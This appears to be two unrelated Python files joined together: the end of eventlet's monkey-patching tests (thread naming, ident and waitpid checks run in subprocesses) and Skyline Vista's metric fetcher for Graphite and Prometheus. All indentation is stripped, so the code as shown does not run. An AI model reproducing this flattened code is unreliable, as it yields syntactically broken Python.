new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
|
fetcher.py
|
from __future__ import division
import logging
from time import time, sleep
from datetime import datetime, timedelta
from threading import Thread
from multiprocessing import Process
import os
# @modified 20191115 - Branch #3262: py3
# from os import kill, getpid
from os import kill
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
try:
from urllib.parse import quote
except:
from urllib import quote
# @modified 20191115 - Branch #3262: py3
# from redis import StrictRedis
import requests
import settings
python_version = int(version_info[0])
if True:
from skyline_functions import (
send_graphite_metric, filesafe_metricname,
# @added 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
get_redis_conn, get_redis_conn_decoded,
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitise_graphite_url)
parent_skyline_app = 'vista'
child_skyline_app = 'fetcher'
skyline_app_logger = '%sLog' % parent_skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app = '%s.%s' % (parent_skyline_app, child_skyline_app)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, parent_skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
skyline_app_graphite_namespace = 'skyline.%s%s.fetcher' % (
parent_skyline_app, SERVER_METRIC_PATH)
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
VISTA_ENABLED = settings.VISTA_ENABLED
except:
VISTA_ENABLED = False
# @added 20210512 - Feature #4064: VERBOSE_LOGGING
try:
VERBOSE_LOGGING = settings.VISTA_VERBOSE_LOGGING
except:
VERBOSE_LOGGING = False
USE_FLUX = False
LOCAL_DEBUG = False
class Fetcher(Thread):
"""
The fetcher thread asynchronisly retrieves the latest data points for
metrics from multiple endpoints using asyncio and aiohttp and submits the
data to the Redis set, vista.fetcher.metrics.json for the worker to process.
"""
def __init__(self, parent_pid):
super(Fetcher, self).__init__()
self.parent_pid = parent_pid
self.daemon = True
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
def check_if_parent_is_alive(self):
"""
Self explanatory.
"""
try:
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent process is dead')
exit(0)
def fetch_process(self, i, metrics_to_fetch):
fetch_process_start = time()
logger.info('fetcher :: fetch_process started')
metrics_to_fetch_count = len(metrics_to_fetch)
logger.info('fetcher :: fetch_process to fetch %s metrics' % str(metrics_to_fetch_count))
if LOCAL_DEBUG:
logger.info('fetcher :: metrics_to_fetch - %s' % str(metrics_to_fetch))
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
def param_value_from_url(url, param_name):
param_value = None
for i in url.split('?', 1)[-1].split('&'):
if i.startswith(param_name + '='):
param_value = i.split('=')[-1]
return param_value
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
# Fetch metrics from the same Graphite host that have the same from
# parameter in batches
try:
graphite_batch_target_count = settings.VISTA_GRAPHITE_BATCH_SIZE
except:
graphite_batch_target_count = 20
graphite_batches = [] # [batch_no, remote_host, from_timestamp, url]
in_batch_responses = []
batch_number = 0
for remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password in metrics_to_fetch:
if remote_host_type != 'graphite':
continue
try:
url_elements = url.split('/')
remote_host = url_elements[2]
except Exception as e:
logger.error('error :: fetcher :: failed to determine the remote_host from the url - %s - %s' % (
str(url), e))
from_timestamp = None
try:
from_timestamp_str = param_value_from_url(url, 'from')
try:
from_timestamp = int(from_timestamp_str)
except:
from_timestamp = None
except Exception as e:
logger.error('error :: fetcher :: failed to determine the timestamp from the from url parameter - %s - %s' % (
str(url), e))
if not from_timestamp:
continue
target = None
try:
target = param_value_from_url(url, 'target')
except Exception as e:
logger.error('error :: fetcher :: failed to determine the metric from the target url parameter - %s - %s' % (
str(url), e))
added_to_batch = False
add_to_batch = False
for batch_number, batch_remote_host, batch_from_timestamp, batch_url in graphite_batches:
if added_to_batch:
continue
try:
if remote_host == batch_remote_host:
if str(from_timestamp) == str(batch_from_timestamp):
try:
if batch_url.count('target') < graphite_batch_target_count:
add_to_batch = int(batch_number)
except Exception as e:
logger.error('error :: fetcher :: failed to determine whether to add to batch - %s' % e)
continue
except:
logger.error('error :: fetcher :: failed to determine whether to add to batch')
if not add_to_batch:
batch_number += 1
batch_url = url
batch_data = [batch_number, remote_host, from_timestamp_str, url]
graphite_batches.append(batch_data)
added_to_batch = batch_number
if add_to_batch:
new_graphite_batches = []
for batch_number, batch_remote_host, batch_from_timestamp, batch_url in graphite_batches:
if batch_number == add_to_batch:
new_end = '&target=%s&format=json' % remote_target
new_url = batch_url.replace('&format=json', new_end)
batch_url = new_url
added_to_batch = batch_number
batch_data = [batch_number, batch_remote_host, batch_from_timestamp, batch_url]
new_graphite_batches.append(batch_data)
graphite_batches = new_graphite_batches
if added_to_batch:
in_batch_responses.append(target)
batch_responses = []
start_batch_fetches = int(time())
for batch_number, remote_host, from_timestamp_str, url in graphite_batches:
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitised = False
sanitised, url = sanitise_graphite_url(skyline_app, url)
try:
batch_response = requests.get(url)
batch_js = batch_response.json()
batch_responses.append(batch_js)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to get valid response for batch request %s - %s' % (
str(url), e))
if batch_responses:
end_batch_fetches = int(time())
time_to_fetch_batches = end_batch_fetches - start_batch_fetches
logger.info('fetcher :: %s metric batch requests of %s metrics per batch were fetched in %s seconds' % (
str(len(batch_responses)), str(graphite_batch_target_count), str(time_to_fetch_batches)))
if in_batch_responses:
logger.info('fetcher :: %s metrics were fetched in batch requests' % str(len(in_batch_responses)))
for remote_host_type, frequency, remote_target, graphite_target, metric, url, namespace_prefix, api_key, token, user, password in metrics_to_fetch:
success = False
# @added 20191127 - Feature #3338: Vista - batch Graphite requests
# Get the metric timeseries from the batch responses and if it is
# not found no js variable will be set and the metric will be
# requested individually as per the default behaviour
js = None
batched_response = False
if remote_target in in_batch_responses:
try:
for responses in batch_responses:
for i in responses:
if str(i['target']) == remote_target:
js = i
batched_response = True
success = True
if VERBOSE_LOGGING:
logger.info('fetcher :: data for %s was fetched in a batch' % str(remote_target))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to detemine if %s was in batch_responses - %s' % (
str(remote_target), e))
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitised = False
sanitised, url = sanitise_graphite_url(skyline_app, url)
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# Wrapped in if not success
response = None
if not success:
try:
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: getting data from %s' % str(url))
response = requests.get(url)
if response.status_code == 200:
success = True
except Exception as e:
logger.error(traceback.format_exc())
# @modified 20191115 - Branch #3262: py3
# Do not report last response data
# logger.error('error :: fetcher :: http status code - %s, reason - %s' % (
# str(response.status_code), str(response.reason)))
logger.error('error :: fetcher :: failed to get data from %s - %s' % (
str(url), e))
if not success:
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
# And set flux.last key is the returned value from the remote is
# null so that time series that are mostly null do not keep on
# getting added to flux populate_metric by Vista
raw_timeseries = []
datapoints = None
try:
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# js = response.json()
if not js:
js = response.json()
else:
if VERBOSE_LOGGING:
logger.info('fetcher :: data for %s was fetched in a batch' % str(remote_target))
if remote_host_type == 'graphite':
# @modified 20191127 - Feature #3338: Vista - batch Graphite requests
# datapoints = js[0]['datapoints']
if not batched_response:
datapoints = js[0]['datapoints']
else:
datapoints = js['datapoints']
if remote_host_type == 'prometheus':
# TODO:
# Maybe iterate through multiple metrics if response has more than one metric
# for some public lab metrics
datapoints = js['data']['result'][0]['values']
datapoints_fetched = len(datapoints)
# @modified 20191011 - Task #3258: Reduce vista logging
if LOCAL_DEBUG:
logger.info('fetcher :: retrieved %s data points from %s' % (
str(datapoints_fetched), str(url)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to get data from %s - %s' % (
str(url), e))
# Example
# datapoints[0]
# [7.3, 1556817000]
# Add each data point and timestamp to the timeseries list so
# they can be sent to Graphite
if not datapoints:
logger.info('fetcher :: failed to get any data from %s' % str(url))
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
valid_datapoints = []
for datapoint in datapoints:
value = None
timestamp = None
if remote_host_type == 'graphite':
try:
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
raw_timeseries.append([datapoint[1], datapoint[0]])
raw_value = datapoint[0]
if raw_value is None:
continue
value = float(datapoint[0])
timestamp = int(datapoint[1])
valid_datapoints.append([value, timestamp])
except:
continue
if remote_host_type == 'prometheus':
try:
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
raw_timeseries.append([datapoint[0], datapoint[1]])
raw_value = datapoint[1]
if raw_value is None:
continue
timestamp = int(datapoint[0])
value = float(datapoint[1])
except:
continue
valid_datapoints.append([timestamp, value])
datapoints = valid_datapoints
# Order the time series by timestamp as the tuple can shift
# order resulting in more recent data being added before older
# data
datapoints.sort()
# However check if a metric is known to Flux and if so do not
# use all resolutions just from the last.flux known timestamp
# for he metric
last_flux_timestamp = None
redis_last_flux_metric_data = None
cache_key = 'flux.last.%s' % metric
try:
# if python_version == 3:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key).decode('utf-8')
# else:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key)
redis_last_flux_metric_data = self.redis_conn_decoded.get(cache_key)
if LOCAL_DEBUG:
if redis_last_flux_metric_data:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_flux_timestamp = False
redis_last_flux_metric_data = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
redis_last_flux_metric_data = False
if redis_last_flux_metric_data:
try:
last_flux_metric_data = literal_eval(redis_last_flux_metric_data)
last_flux_timestamp = int(last_flux_metric_data[0])
if LOCAL_DEBUG:
if last_flux_timestamp:
logger.info('fetcher :: Redis key %s last_flux_timestamp %s' % (str(cache_key), str(last_flux_timestamp)))
else:
logger.info('fetcher :: Redis key %s last_flux_timestamp unknown' % (str(cache_key)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_flux_timestamp - %s' % e)
last_flux_timestamp = False
value = None
timestamp = None
datapoints_added_to_timeseries = 0
datapoints_already_populated = 0
datapoints_with_no_value = 0
timeseries = []
for datapoint in datapoints:
try:
if remote_host_type == 'graphite':
raw_value = datapoint[0]
if raw_value is None:
continue
value = float(datapoint[0])
timestamp = int(datapoint[1])
if remote_host_type == 'prometheus':
timestamp = int(datapoint[0])
# value = float(datapoint[1])
try:
value = float(datapoint[1])
except:
continue
submit_data = True
if last_flux_timestamp:
if timestamp <= last_flux_timestamp:
submit_data = False
datapoints_already_populated += 1
if submit_data:
new_datapoint = [timestamp, value]
timeseries.append(new_datapoint)
datapoints_added_to_timeseries += 1
# nosec to exclude from bandit tests
except: # nosec
datapoints_with_no_value += 1
continue
# @added 20191111 - Bug #3312: flux - populate_metric_worker - handle None in datapoints
# And set flux.last key is the returned value from the remote is
# null so that time series that are mostly null do not keep on
# getting added to flux populate_metric by Vista
if not timeseries:
set_flux_key = False
last_ts = None
try:
sorted_raw_timeseries = sorted(raw_timeseries, key=lambda x: x[0])
last_ts = sorted_raw_timeseries[-1][0]
if int(last_ts) > (fetch_process_start - 120):
if sorted_raw_timeseries[-1][1] is None:
set_flux_key = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: failed to determine if last value was null - %s' % e)
if set_flux_key:
cache_key = 'flux.last.%s' % metric
try:
# Update Redis flux key
metric_data = [int(last_ts), None]
self.redis_conn.set(cache_key, str(metric_data))
if VERBOSE_LOGGING:
logger.info('fetcher :: even though no data points so as to not loop round on this metric, set the metric Redis key - %s - %s' % (
cache_key, str(metric_data)))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: even though no data points, failed to set Redis key - %s - %s' % (
cache_key, e))
# Adding to the vista.fetcher.unique_metrics Redis set
redis_set = 'vista.fetcher.unique_metrics'
data = str(metric)
try:
self.redis_conn.sadd(redis_set, data)
if VERBOSE_LOGGING:
logger.info('fetcher :: even though no data points, added %s to Redis set %s' % (
remote_target, redis_set))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: even though no data points, failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
continue
if not timeseries:
if VERBOSE_LOGGING:
logger.info('fetcher :: no new data in the timeseries list for the time series for %s' % metric)
continue
# Order the time series by timestamp as the tuple can shift
# order resulting in more recent data being added before older
# data
timeseries.sort()
timeseries_length = len(timeseries)
if VERBOSE_LOGGING:
logger.info('fetcher :: %s data points to add to vista.fetcher.metrics.json for %s' % (
str(timeseries_length), metric))
payload = None
timeseries_str = '"%s"' % timeseries
try:
payload = [{
'remote_host_type': remote_host_type,
'remote_target': remote_target,
'graphite_target': graphite_target,
'metric': metric,
'namespace_prefix': namespace_prefix,
'key': settings.FLUX_SELF_API_KEY,
'token': token,
'user': user,
'password': password,
'datapoints': timeseries_str
}]
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not build the payload json - %s' % e)
redis_set = 'vista.fetcher.metrics.json'
data = str(payload)
try:
self.redis_conn.sadd(redis_set, data)
if LOCAL_DEBUG:
logger.info('fetcher :: added data from %s to Redis set %s' % (
str(url), redis_set))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
redis_set = 'vista.fetcher.metrics.fetched'
time_now = int(time())
data = [str(remote_target), time_now]
try:
self.redis_conn.sadd(redis_set, str(data))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s - %s' % (
str(data), str(redis_set), e))
fetch_process_end = time()
fetch_time = fetch_process_end - fetch_process_start
logger.info('fetcher :: metrics fetched in %s seconds' % str(fetch_time))
return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Wait for the processes to finish.
- Send skyline.vista metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
VISTA_ENABLED = settings.VISTA_ENABLED
logger.info('VISTA_ENABLED is set to %s' % str(VISTA_ENABLED))
except:
VISTA_ENABLED = True
logger.info('warning :: VISTA_ENABLED is not declared in settings.py, defaults to True')
try:
ASYNCIO_LIMIT = settings.VISTA_ASYNCIO_FETCHER_LIMIT
logger.info('fetcher :: settings.VISTA_ASYNCIO_FETCHER_LIMIT is set to %s' % str(ASYNCIO_LIMIT))
except:
ASYNCIO_LIMIT = 2
logger.info('fetcher :: warning :: VISTA_ASYNCIO_FETCHER_LIMIT is not declared in settings.py, defaults to 2')
running = True
while running:
begin_fetcher_run = int(time())
# Make sure Redis is up
redis_up = False
while not redis_up:
try:
redis_up = self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(2)
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, begin_fetcher_run)
except:
logger.error('error :: fetcher :: could not update the Redis %s key' % skyline_app)
logger.error(traceback.format_exc())
# Known fetcher metrics that are known to have already been fetched,
# metrics in this set are named as follows namespace_prefix.metric
vista_fetcher_unique_metrics = []
redis_set = 'vista.fetcher.unique_metrics'
try:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# vista_fetcher_unique_metrics = list(self.redis_conn.smembers(redis_set))
vista_fetcher_unique_metrics = list(self.redis_conn_decoded.smembers(redis_set))
except:
logger.error('error :: fetcher :: could not determine vista_fetcher_unique_metrics from the Redis set %s' % redis_set)
vista_fetcher_unique_metrics = []
vista_unique_metrics = []
if vista_fetcher_unique_metrics:
for metric in vista_fetcher_unique_metrics:
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# metric_str = metric.decode('utf-8')
metric_str = str(metric)
vista_unique_metrics.append(metric_str)
# Determine metrics to fetch
metrics_to_fetch = []
fetcher_sent_to_flux = 0
if LOCAL_DEBUG:
try:
number_of_metrics = len(settings.VISTA_FETCH_METRICS)
logger.info('fetcher :: %s metrics to retrieve' % str(number_of_metrics))
except:
pass
end_timestamp = int(time())
start_timestamp = end_timestamp - 300
# Refer to settings.VISTA_FETCH_METRICS tuple to determine the
# format of the fetch_tuple
# for target, graphite_target, fetch_tuple in metrics:
for remote_host, remote_host_type, frequency, remote_target, graphite_target, uri, namespace_prefix, api_key, token, user, password, populate_at_resolutions in settings.VISTA_FETCH_METRICS:
try:
# remote_host_type = fetch_tuple[1]
valid_remote_host_type = False
if remote_host_type == 'graphite' or remote_host_type == 'prometheus':
valid_remote_host_type = True
if not valid_remote_host_type:
logger.error('error :: invalid remote_host_type for %s in %s' % (
remote_target, str(remote_host_type)))
continue
if LOCAL_DEBUG:
logger.info('fetcher :: processing %s remote_target %s' % (
str(remote_host_type), str(remote_target)))
remote_graphite_host = None
if remote_host_type == 'graphite':
remote_graphite_host = remote_host
url = '%s%s%s' % (remote_graphite_host, uri, str(remote_target))
if LOCAL_DEBUG:
logger.info('fetcher :: with url %s' % str(url))
default_prometheus_uri = False
remote_prometheus_host = None
if remote_host_type == 'prometheus':
remote_prometheus_host = remote_host
# Hardcode the Prometheus api uri
# uri = str(fetch_tuple[3])
# uri = '/api/v1/query?query=%s[5m]' % str(remote_target)
# url encode the Prometheus metric query to handle
# labels and query chars in the URI
urlencoded_remote_target = quote(remote_target)
if uri == 'default':
default_prometheus_uri = True
uri = '/api/v1/query_range?query=%s&start=%s&end=%s&step=60s' % (
str(urlencoded_remote_target),
str(start_timestamp), str(end_timestamp))
url = '%s%s' % (remote_prometheus_host, uri)
if LOCAL_DEBUG:
logger.info('fetcher :: with url %s' % str(url))
frequency = int(frequency)
if LOCAL_DEBUG:
logger.info('fetcher :: with frequency %s' % str(frequency))
if LOCAL_DEBUG:
logger.info('fetcher :: with namespace_prefix %s' % str(namespace_prefix))
if namespace_prefix != '':
metric = '%s.%s' % (namespace_prefix, graphite_target)
metric = filesafe_metricname(metric)
else:
metric = graphite_target
metric = filesafe_metricname(metric)
if LOCAL_DEBUG:
logger.info('fetcher :: with metric %s' % str(metric))
api_key = str(api_key)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with api_key %s' % str(api_key))
logger.info('fetcher :: with api_key (no disclosure)')
token = str(token)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with token %s' % str(token))
logger.info('fetcher :: with token (no disclosure)')
user = str(user)
if LOCAL_DEBUG:
logger.info('fetcher :: with user %s' % str(user))
password = str(password)
if LOCAL_DEBUG:
# @modified 20210421 - Task #4030: refactoring
# semgrep - python-logger-credential-disclosure
# logger.info('fetcher :: with password %s' % str(password))
logger.info('fetcher :: with password (no disclosure)')
populate_at_resolutions_str = str(populate_at_resolutions)
if LOCAL_DEBUG:
logger.info('fetcher :: with populate_at_resolutions %s' % populate_at_resolutions_str)
# Handle if the user passes (None) instead of None
if populate_at_resolutions == ():
populate_at_resolutions = None
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: could not determine the required values in VISTA_FETCH_METRICS tuple for - %s - %s' % (
str(remote_target), e))
continue
# If the metric is not known to Vista and the metric
# has a populate_at_resolutions set, send to Flux to
# pre-populate Graphite
pre_populate_graphite_metric = False
if remote_target not in vista_unique_metrics:
if remote_host_type == 'graphite' and populate_at_resolutions:
pre_populate_graphite_metric = True
logger.info('fetcher :: attempting to pre-populate Graphite metric - %s' % (
metric))
if remote_host_type == 'prometheus' and populate_at_resolutions:
pre_populate_graphite_metric = True
logger.info('fetcher :: attempting to pre-populate Prometheus metric - %s' % (
metric))
else:
if LOCAL_DEBUG:
logger.info('fetcher :: remote_target %s is present in vista_unique_metrics' % str(remote_target))
# However check if a metric is known to Flux and if so do not
# use all resolutions just from the last.flux known timestamp
# for he metric
last_flux_timestamp = None
redis_last_flux_metric_data = None
cache_key = None
try:
cache_key = 'flux.last.%s' % metric
# @modified 20191111 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# @modified 20191128 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if python_version == 3:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key).decode('utf-8')
# else:
# redis_last_flux_metric_data = self.redis_conn.get(cache_key)
redis_last_flux_metric_data = self.redis_conn_decoded.get(cache_key)
if LOCAL_DEBUG:
if redis_last_flux_metric_data:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
except AttributeError:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
last_flux_timestamp = False
redis_last_flux_metric_data = False
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: fetcher :: retrieving Redis key %s data - %s' % (
str(cache_key), str(e)))
redis_last_flux_metric_data = False
if redis_last_flux_metric_data:
try:
last_flux_metric_data = literal_eval(redis_last_flux_metric_data)
last_flux_timestamp = int(last_flux_metric_data[0])
if LOCAL_DEBUG:
if last_flux_timestamp:
logger.info('fetcher :: Redis key %s last_flux_timestamp %s' % (str(cache_key), str(last_flux_timestamp)))
else:
logger.info('fetcher :: Redis key %s last_flux_timestamp unknown' % (str(cache_key)))
except:
logger.error(traceback.format_exc())
logger.error('error :: fetch :: failed determining last_flux_timestamp')
last_flux_timestamp = False
time_now = int(time())
if last_flux_timestamp:
last_fetch = time_now - last_flux_timestamp
if last_fetch < frequency:
if LOCAL_DEBUG:
logger.info('fetcher :: last fetch was %s seconds ago, less than frequency %s seconds, not fetching' % (str(last_fetch), str(frequency)))
continue
# @added 20200107 - Task #3376: Enable vista and flux to deal with lower frequency data
# Determine the last known resolution of the metric
last_vista_metric_resolution = frequency
try:
cache_key = 'vista.last.resolution.%s' % metric
last_vista_metric_resolution_data = self.redis_conn_decoded.get(cache_key)
if last_vista_metric_resolution_data is None:
last_vista_metric_resolution_int = last_vista_metric_resolution
else:
last_vista_metric_resolution_int = int(last_vista_metric_resolution_data)
if last_vista_metric_resolution_int > 0:
last_vista_metric_resolution = last_vista_metric_resolution_int
if LOCAL_DEBUG:
if last_vista_metric_resolution:
logger.info('fetcher :: Redis key %s is present' % str(cache_key))
else:
logger.info('fetcher :: Redis key %s is not present' % str(cache_key))
